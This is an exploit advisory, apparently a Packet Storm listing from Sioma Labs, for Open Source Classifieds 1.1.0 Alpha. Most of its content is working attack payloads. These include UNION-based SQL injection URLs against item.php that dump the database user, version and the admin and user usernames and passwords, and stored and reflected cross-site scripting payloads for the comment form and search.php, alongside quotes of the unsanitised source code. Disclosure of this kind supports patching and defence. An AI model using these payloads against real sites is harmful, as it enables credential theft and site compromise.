Open Source Classifieds 1.1.0 Alpha Cross Site Scripting / SQL Injection

2010-02-19T00:00:00
ID PACKETSTORM:86461
Type packetstorm
Reporter Sioma Labs
Modified 2010-02-19T00:00:00

Description

                                        
                                            `  
__ _ __ _   
/ _(_) ___ _ __ ___ __ _ / / __ _| |__ ___   
\ \| |/ _ \| '_ ` _ \ / _` | / / / _` | '_ \/ __|  
_\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \  
\__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/  
========================================================================================  
Open Source Classifieds (OSClassi) SQLi/Xss Multi Vulnerabilities  
----------------------------------------------------------------------------------------  
- Site : http://osclass.org/   
- Download : http://sourceforge.net/projects/osclass/files/  
- Author : Sioma Labs  
- Version : 1.1.0 Alpha  
- Tested on : WIndows XP SP2 (WAMP)  
  
[-------------------------------------------------------------------------------------------------------------------------]  
  
MYSQL Injection   
===============  
POC  
http://localhost/item.php?id=[SQLi]  
  
Basic Info  
http://localhost/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(CHAR(32,58,32),user(),database(),version())--  
  
Admin ID,Username,Password  
http://localhost/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from oc_admin--  
  
User ID,UserName,Password  
http://localhost/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from+oc_user--  
  
[-------------------------------------------------------------------------------------------------------------------------]  
Cross Site Scripting  
====================  
  
Xss Source Review (item.php)  
------------------------------  
  
1st Xss item.php   
[+] To Work This You need to Have A iteam already posted (http://localhost/item.php?action=post)  
------------------------------  
case 'add_comment':  
dbExec("INSERT INTO %sitem_comment (item_id, author_name, author_email, body) VALUES (%d, '%s', '%s', '%s')",   
DB_TABLE_PREFIX, $_POST['id'], $_POST['authorName'], $_POST['authorEmail'], $_POST['body']);  
header('Location: item.php?id=' . $_POST['id']);  
break;  
case 'post':  
------------------------------  
  
[+] Put This c0de in to the comment box  
"><script>alert(String.fromCharCode(88, 83, 83));</script>  
  
-------------------------------  
  
2nd Xss (search.php)  
---------------------------------  
$pattern = $_GET['pattern'];  
--------------------------------  
  
POC  
http://localhost/search.php?pattern=[Xss]  
Exploit  
http://localhost/search.php?pattern=<script>alert(String.fromCharCode(88, 83, 83));</script>  
  
[-------------------------------------------------------------------------------------------------------------------------]  
  
# http://siomalabs.com [Sioma Labs]  
# Sioma Agent 154  
`